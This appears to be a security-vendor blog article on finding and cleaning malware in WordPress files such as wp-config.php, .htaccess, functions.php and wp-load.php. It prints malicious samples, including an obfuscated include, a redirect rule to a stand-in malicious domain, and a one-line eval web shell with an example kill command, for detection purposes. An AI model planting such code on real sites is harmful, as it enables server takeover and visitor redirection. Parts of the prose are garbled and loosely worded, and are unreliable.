How to Scan & Fix WordPress Files that are Infected?

Fix wp-load php hacked, wp-config php hack, index php wp hacked, exploit wp-config PHP, wp-blog header php .
Fix wp-load php hacked, wp-config php hack, index php wp hacked, exploit wp-config PHP, wp-blog header php .

WordPress has made it super simple to create websites and has encouraged people to have an online presence from all sorts of backgrounds.

Taking care of your WordPress protection is necessary when creating your own website. One morning, the last thing you want to do is wake up to see your website hacked and all your growth and SEO efforts down the drain.

Because of its success, along with its themes & plugins, hackers tend to hit WordPress. If they discover a flaw in one plugin, nearly all the websites with that plugin enabled could easily be abused.

Fix WordPress Files hack

As an example, take the recent vulnerabilities in Elementor & Ultimate Addons. It is estimated that since the vulnerability came to light, over 1 million websites using Elementor Pro, and 110,000 pages with Ultimate Addons were left exposed. The faults in the plugins allowed authorised users to upload arbitrary files to a Remote Code Execution (RCE) website. Hackers have been able to obtain & retain complete functional access to WordPress with this.

Likewise, in the ‘Slider Revolution’ plugin, there was an LFI vulnerability which made it possible for hackers to download wp-config.php from the insecure WordPress pages. This resulted in a leak of database details, encryption keys, and other confidential information about a website setup. This was previously known as the wp-config.php hack.

In this document, we’ll talk about all the essential files and locations that might have been hit by hackers & malware on your WordPress account.

1) WordPress Hack wp-config.php

For a WP installation, wp-config.php is an essential file. It is the configuration file that the web uses that serves as the interface between the database and the WP file system. The file wp-config.php contains material that is sensitive, such as:

  • Host database
  • Password, username, & port number
  • Name of the Database
  • Keys to protection for WordPress
  • Prefix for Database Table

It’s a common target among hackers due to its critical nature. A crucial bug was discovered in November 2016 in the Revolution Picture Slider plugin. If hackers get hold of the database login information from the wp-config.php exploit, they attempt to link to the database and build fake WP admin accounts for themselves.

This was an LFI (Local File Inclusion) intrusion that enabled hackers to download the wp-config file. This offers a website and the archive direct access to them. The hacker is exposed to confidential data such as user credentials, email IDs, directories, photos, transaction information from WooCommerce, and so on. They can also instal scripts, such as the Filesman backdoor, to provide continued access to the WordPress account.

2) Index.php of WordPress Hacked

The index.php file is the entry point for each website on WordPress. Since this runs on every page of your website, hackers insert malicious code that effects your entire website.

For instance, the target index.php files of the pub2srv malware & Favicon malware hack. This wide distributed malware redirection campaign was tracked by researchers at Astra Security and found that malicious code such as @include “\x2f/sgb\x2ffavi\x63on_5\x34e6ed\x2eico” was applied to the index.php files; and the code in the screenshot below:


Malicious code found to be inserted in the index.php file of a WordPress installation

The index.php file was later changed to index.php.bak by some ransomware activities, forcing the website to crash and not load at all.

In the index.php file, such malicious code can cause website visitors to see odd popups, commercials, or even to be routed to other spam pages. Compare the contents of this file with the initial copy published by WordPress to repair such a hack.

3) File Hacked for WordPress .htaccess

The .htaccess file, often found in the home location of your WordPress website, helps configure the server settings as required by the website. This is often found in servers running on Apache. The .htaccess file is a very strong component for controlling the performance and behaviour of your web server. It can also be used to control your website’s security. The following are some common uses of the .htaccess file:

  • Restrict access to certain site folders
  • Configure the site’s maximum memory usage
  • Build Redirects
  • HTTPS Control
  • Caching Administration
  • Preventing a few attacks by script injection
  • Maximum File Upload Sizes Control
  • Stop bots from being able to find usernames
  • Hotlinking Block Image
  • Control automated file downloads
  • Administrate file extensions

However, these characteristics can be used for extracting clicks for the attacker while under attack. To redirect users, the .htaccess file is often injected with malicious code. It is used often to view spam to consumers. For example , look at the code provided below:

RewriteEngine On
 RewriteOptions inherit
 RewriteCond %{HTTP_REFERER} .**$ [NC,OR]
 RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
 RewriteCond %{HTTP_REFERER} .**$ [NC,OR]
 RewriteCond %{HTTP_REFERER} .**$ [NC,OR]
 RewriteCond %{HTTP_REFERER} .**$ [NC,OR]
 RewriteCond %{HTTP_REFERER} .**$ [NC,OR]
 RewriteCond %{HTTP_REFERER} .**$ [NC,OR]
 RewriteCond %{HTTP_REFERER} .**$ [NC,OR]
 RewriteCond %{HTTP_REFERER} .**$ [NC]
 RewriteRule .* http://MaliciousDomain.tld/bad.php?t=3 [R,L]

In the last line, the malicious code is redirecting user traffic from the site. As a result, tohttp:/MaliciousDomain.tld is redirected to the users. Then, thebad.php script tries to load. Due to the .htaccess file hack, if you notice unusual redirects from your site, it is possible. If you don’t find the file, however, or if it’s empty, don’t panic, as this file is not mandatory (unless you use pretty WordPress URLs).

4) WordPress footer.php & header.php (Files Hacked by WordPress Theme)

There is a file called footer.php and header.php for each WordPress theme, which has the footer and header code for the site. Scripts & certain widgets that remain the same throughout the website are included in this area. The share widget or the social media widgets at the bottom of your website, for instance. Or it could sometimes be just copyright info, credits, etc.

So, these two files are critical files that attackers can hack. It is often used to redirect malware and display spam content, as was the case with the Redirect Malware digestcolect[.com].

Some of this was decoded and hackers were found leveraging browser cookies to identify users and show them malicious ads, etc.

In addition, the attackers injected JavaScript codes into all files with an extension of .js in another instance. Because of the large-scale infection, such hacks often become hard to clean.

5) Features of WordPress.php Hacked

In the theme folder, the functions file acts like a plugin does. Which means that it can be used to add additional features and features to the WordPress site. It is possible to use filefunctions.php for:

  • Calling events / functions for WordPress
  • To call PHP ‘s native functions.
  • Or to describe functions of your own.

For any theme, the functions.php file is present, but it is important to remember that only one functions.php file is run at every given moment, the one in the active theme. Due to this, in the Wp-VCD Backdoor Exploit, the functions.php files were deliberately attacked by attackers. This malware, such as Pharma and Japanese SEO spam, created new administrators and injected spam pages on the site.

<?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?>

This software contains the class.theme-modules.php software, as is apparent from the above code. This file is then used (even if it’s disabled) to inject malware into other themes built on your site. New users and backdoors are thus created. This allowed the site to be accessed by attackers even after the file was cleaned up.

6) wp-load.php hacked

What is the wp-load WordPress Malware?

If you see unfamiliar files in your WordPress site’s web root, such as wp-load-eFtAh.php, it’s possible that your site has been hacked. There is only one line of code in these files that is harmful in nature. This code acts as a backdoor, allowing hackers to run PHP code, run system commands, and connect to the WordPress database, among other things.

Because typical malware scanners frequently fail to detect such files, they are widely exploited.

Common File Names of wp-load.php hack 

  • wp-load-eFtAh.php
  • wp-load-qPrOj.php
  • wp-load-sJgKb.php

An significant file for a WordPress platform is wp-load.php. The file wp-load.php lets bootstrap the WordPress environment and allows plugins the right to access the key functionality of native WP. As seen in the case of China Chopper Web shell ransomware, many of the malware variants infect WordPress pages by generating malicious wp-load archives. This usual action was the development on the server of files like wp-load-eFtAh.php. As the name matches the name of the original file, when you signed in to FTP, you would not have found it odd. Those files might have codes such as:

wp-load.php hacked Code Sample – Fix WordPress Files hack now!

<?php /*5b7bdc250b181*/ ?><?php @eval($_POST['pass']);?>

This code helps the intruder to run every PHP code in the pass parameter on the web that is submitted by the hackers. Harmful instructions may be implemented using this loophole. The http:/yoursite / your.php? order, for example, pass = system(“killall -9 apache); “may kill the processes of the webserver. This will render the whole server shut down. Do not judge this code by its length-it is unsafe enough to remotely monitor your server.

How to Fix the wp-load.php hacked file (DIY)?

  1. Delete the wp-load-*.php files that are harmful.
  2. Examine complete WordPress core files, plugins, and themes to check whether the hacker has modified any of them.
  3. Look for any unrecognised WordPress admin users who have been added to the server.
  4. Look for any web shells on the servers.

That’s it you have removed WP load PHP hacked files!

7) Flood of class-wp-cache.php Server files

We’ve seen that cPanel and the entire web server get millions or even thousands of class-wp-cache.php files in one of the recent hacks. These malicious files corrupt every folder of the website, including the main files. A loophole in the website code that opens up an inlet for hackers is typically the source of this infection.